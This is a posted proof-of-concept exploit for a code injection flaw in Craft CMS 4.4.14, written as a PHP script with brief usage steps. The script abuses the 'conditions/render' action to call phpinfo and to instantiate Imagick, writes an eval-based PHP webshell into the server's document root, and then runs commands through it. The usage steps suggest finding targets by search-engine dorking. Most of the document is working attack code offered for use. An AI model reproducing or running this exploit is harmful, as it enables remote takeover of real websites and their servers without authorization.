Craft CMS 4.4.14 Code Injection

=============================================================================================================================================
| # Title : Craft CMS 4.4.14 Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) |
| # Vendor : https://craftcms.com/ |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] uses the CURL to Allow remote command .

[+] Line 116 set your target .

[+] save code as poc.php .

[+] USage : cmd => c:\www\test\php poc.php

[+] PayLoad :

<?php
class CraftCMSExploit {
private $target_uri;
private $webshell;
private $config = [‘upload_tmp_dir’ => null, ‘document_root’ => null];
private $post_param;
private $get_param;

public function __construct($target_uri, $webshell = ”) {
$this->target_uri = $target_uri;
$this->webshell = $webshell ? $webshell : $this->generateRandomString(8, 16) . ‘.php’;
$this->post_param = $this->generateRandomString(1, 8);
$this->get_param = $this->generateRandomString(1, 8);
}

public function check_phpinfo() {
// Sends a crafted request to extract upload_tmp_dir and document_root from phpinfo()
$data = http_build_query([
‘action’ => ‘conditions/render’,
‘configObject[class]’ => ‘craft\\elements\\conditions\\ElementCondition’,
‘config’ => ‘{“name”:”configObject”,”as “:{“class”:”\\\GuzzleHttp\\\Psr7\\\FnStream”, “__construct()”:{“methods”:{“close”:”phpinfo”}}}}’
]);

$response = $this->sendPostRequest($this->target_uri, $data);
if ($response) {
$this->parsePHPInfo($response);
}
}

private function parsePHPInfo($response) {
// Parses the phpinfo() HTML response to find upload_tmp_dir and document_root
if (preg_match(‘/upload_tmp_dir.+<td class=”v”>(.*)<\/td>/i’, $response, $matches)) {
$this->config[‘upload_tmp_dir’] = $matches[1] == ‘no value’ ? ‘/tmp’ : trim($matches[1]);
}
if (preg_match(‘/DOCUMENT_ROOT.+<td class=”v”>(.*)<\/td>/i’, $response, $matches)) {
$this->config[‘document_root’] = trim($matches[1]);
}
}

public function upload_webshell() {
// Generates an XML payload to upload the webshell via Imagick MSL
$payload = “<?xml version=\”1.0\” encoding=\”UTF-8\”?>
<image>
<read filename=\”caption:<?php @eval(base64_decode(\$_POST[‘{$this->post_param}’])); ?>\” />
<write filename=\”info:{$this->config[‘document_root’]}/{$this->webshell}\” />
</image>”;

$form_data = [
‘action’ => ‘conditions/render’,
‘configObject[class]’ => ‘craft\\elements\\conditions\\ElementCondition’,
‘config’ => ‘{“name”:”configObject”,”as “:{“class”:”Imagick”, “__construct()”:{“files”:”msl:/dev/null”}}}’,
‘payload’ => $payload
];

$response = $this->sendMultipartPostRequest($this->target_uri, $form_data);
return strpos($response, ‘502’) !== false;
}

public function execute_command($cmd) {
// Executes a command on the server via the uploaded webshell
$payload = base64_encode($cmd);
$data = http_build_query([$this->post_param => $payload]);

return $this->sendPostRequest($this->target_uri . ‘/’ . $this->webshell, $data);
}

private function sendPostRequest($uri, $data) {
$options = [
‘http’ => [
‘header’ => “Content-type: application/x-www-form-urlencoded\r\n”,
‘method’ => ‘POST’,
‘content’ => $data,
],
];
$context = stream_context_create($options);
return file_get_contents($uri, false, $context);
}

private function sendMultipartPostRequest($uri, $data) {
// Sends a multipart form-data POST request
$boundary = uniqid();
$delimiter = ‘——‘ . $boundary;

$post_data = $this->buildMultipartData($data, $delimiter);

$options = [
‘http’ => [
‘header’ => “Content-Type: multipart/form-data; boundary=” . $boundary . “\r\n”,
‘method’ => ‘POST’,
‘content’ => $post_data,
],
];

$context = stream_context_create($options);
return file_get_contents($uri, false, $context);
}

private function buildMultipartData($data, $delimiter) {
$post_data = ”;
foreach ($data as $name => $content) {
$post_data .= “–$delimiter\r\n”;
$post_data .= “Content-Disposition: form-data; name=\”$name\”\r\n\r\n”;
$post_data .= “$content\r\n”;
}
$post_data .= “–$delimiter–\r\n”;
return $post_data;
}

private function generateRandomString($min, $max) {
$length = rand($min, $max);
return substr(str_shuffle(‘abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ’), 0, $length);
}
}

// Usage
$exploit = new CraftCMSExploit(‘http://target-craftcms.com’);
$exploit->check_phpinfo();
if ($exploit->upload_webshell()) {
echo $exploit->execute_command(‘whoami’);
}
?>

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

نوشته های مشابه

Artica Proxy 4.40 Code Injection

Chamilo 1.11.18 Code Injection

Gibbon School Platform 26.0.00 Code Injection

GL.iNet 4.4.3 Code Injection